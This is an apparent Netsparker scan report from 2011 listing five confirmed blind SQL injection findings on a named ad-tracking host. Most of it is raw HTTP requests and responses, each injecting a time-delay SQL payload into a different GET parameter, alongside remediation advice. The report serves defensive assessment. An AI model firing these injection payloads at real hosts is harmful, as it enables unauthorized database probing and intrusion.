Blind SQL Injection, CWE-89, trk.vindicosuite.comLoading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
18
identified
15
confirmed
5
critical
4
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
CRITICAL
28 %
IMPORTANT
28 %
MEDIUM
11 %
LOW
11 %
INFORMATION
22 %
|
|
Blind SQL Injection
Blind SQL Injection
5
TOTAL
CRITICAL
CONFIRMED
5
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
- Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
- Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
Remedy
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1;WAITFOR DELAY '0:0:25'-- |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:11:09 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD; path=/
X-Powered-By: ASP.NET
Content-Length: 742
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755286999', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:11:09 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD; path=/
X-Powered-By: ASP.NET
Content-Length: 742
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755286999', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 1;WAITFOR DELAY '0:0:25'-- |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=1;WAITFOR%20DELAY%20%270:0:25%27--&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:14:02 GMT
Expires: Sat, 12 Feb 2011 20:13:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 743
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 1;WAITFOR DELAY '0:0:25'--, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753204531', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:14:02 GMT
Expires: Sat, 12 Feb 2011 20:13:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 743
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 1;WAITFOR DELAY '0:0:25'--, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '753204531', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 1;WAITFOR DELAY '0:0:25'-- |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=1;WAITFOR%20DELAY%20%270:0:25%27--&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:16:50 GMT
Expires: Sat, 12 Feb 2011 20:16:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 744
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 1;WAITFOR DELAY '0:0:25'--, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '760830641', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:16:50 GMT
Expires: Sat, 12 Feb 2011 20:16:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 744
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 1;WAITFOR DELAY '0:0:25'--, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '760830641', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 1;WAITFOR DELAY '0:0:25'-- |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1;WAITFOR%20DELAY%20%270:0:25%27--&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:19:46 GMT
Expires: Sat, 12 Feb 2011 20:19:21 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 740
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@ipAddress', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 1;WAITFOR DELAY '0:0:25'--, @ipAddress = '173.193.214.243', @sessionId = '752759565', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:19:46 GMT
Expires: Sat, 12 Feb 2011 20:19:21 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 740
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@ipAddress', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 1;WAITFOR DELAY '0:0:25'--, @ipAddress = '173.193.214.243', @sessionId = '752759565', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 1;WAITFOR DELAY '0:0:25'-- |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=1;WAITFOR%20DELAY%20%270:0:25%27--&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=LDBJNNMCABPMNILEJEAPHNCE; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
